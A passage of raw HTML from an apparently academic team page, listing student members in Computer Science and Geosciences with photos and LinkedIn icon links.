class=\"\">Vineeth Kumar Chandha</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c189\" class=\"h-text h-text-component style-915 style-local-182-c189 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c190\" class=\"style-917 style-local-182-c190 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/vineeth-kumar-chandha-207611149/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c191-outer\">\n            <div data-colibri-id=\"182-c191\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c191 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c192\" class=\"d-block style-913 style-local-182-c192 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-cropped-sathwik-2-scaled-1-e1697208827396.jpg\" class=\"wp-image-1788 style-913-image style-local-182-c192-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c192-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c193\" class=\"h-global-transition-all h-heading style-914 style-local-182-c193 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c193\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sathwik Chowda</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c194\" class=\"h-text h-text-component style-915 style-local-182-c194 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c195\" class=\"style-917 style-local-182-c195 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sathwikchowda/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c196-outer\">\n            <div data-colibri-id=\"182-c196\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c196 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c197\" class=\"d-block style-913 style-local-182-c197 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Brindal-e1697208968672.jpeg\" class=\"wp-image-1790 style-913-image style-local-182-c197-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c197-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c198\" class=\"h-global-transition-all h-heading style-914 style-local-182-c198 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c198\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Brindal Dhol</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c199\" class=\"h-text h-text-component style-915 style-local-182-c199 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c200\" class=\"style-917 style-local-182-c200 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/brindaldhol/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c201-outer\">\n            <div data-colibri-id=\"182-c201\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c201 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c202\" class=\"d-block style-913 style-local-182-c202 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-ruby_parcells-scaled-1-2-e1697209095569.jpg\" class=\"wp-image-1792 style-913-image style-local-182-c202-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c202-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c203\" class=\"h-global-transition-all h-heading style-914 style-local-182-c203 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c203\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ruby Parcells</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c204\" class=\"h-text h-text-component style-915 style-local-182-c204 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c205-outer\">\n            <div data-colibri-id=\"182-c205\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c205 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c206\" class=\"d-block style-913 style-local-182-c206 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Reshmanjali-1-e1697209179440.jpeg\" class=\"wp-image-1794 style-913-image style-local-182-c206-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c206-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c207\" class=\"h-global-transition-all h-heading style-914 style-local-182-c207 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c207\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sai Reshmanjali</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c208\" class=\"h-text h-text-component style-915 style-local-182-c208 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c209\" class=\"style-917 style-local-182-c209 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/reshmanjali-guntupalli/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c210-outer\">\n            <div data-colibri-id=\"182-c210\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c210 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c211\" class=\"d-block style-913 style-local-182-c211 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-cropped-Eliza-Schuh-e1697208271242.jpg\" class=\"wp-image-1795 style-913-image style-local-182-c211-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c211-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c212\" class=\"h-global-transition-all h-heading style-914 style-local-182-c212 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c212\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Eliza Schuh</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c213\" class=\"h-text h-text-component style-915 style-local-182-c213 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c214\" class=\"style-917 style-local-182-c214 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/search/results/all/?fetchDeterministicClustersOnly=true&amp;heroEntityKey=urn%3Ali%3Afsd_profile%3AACoAACVdt3kBua3o83BdyteC4Ssk8shnCAvZZZc&amp;keywords=eliza%20schuh&amp;origin=RICH_QUERY_TYPEAHEAD_HISTORY&amp;position=0&amp;searchId=e7657352-5ea3-4501-b984-d21542771bc4&amp;sid=WW)&amp;spellCorrectionEnabled=true\"\n                        h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c215-outer\">\n            <div data-colibri-id=\"182-c215\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c215 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c216\" class=\"d-block style-913 style-local-182-c216 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Bronson-e1697209357897.png\" class=\"wp-image-1797 style-913-image style-local-182-c216-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c216-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c217\" class=\"h-global-transition-all h-heading style-914 style-local-182-c217 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c217\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Bronson Tharpe</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c218\" class=\"h-text h-text-component style-915 style-local-182-c218 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c219\" class=\"style-917 style-local-182-c219 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/bronson-tharpe-9b754a1ba/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c226-outer\">\n            <div data-colibri-id=\"182-c226\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c226 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c227\" class=\"d-block style-913 style-local-182-c227 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Angelique-e1697207062254.jpg\" class=\"wp-image-1757 style-913-image style-local-182-c227-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c227-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c228\" class=\"h-global-transition-all h-heading style-914 style-local-182-c228 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c228\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Angelique Willis</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c229\" class=\"h-text h-text-component style-915 style-local-182-c229 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c230\" class=\"style-917 style-local-182-c230 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/angelique-willis/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 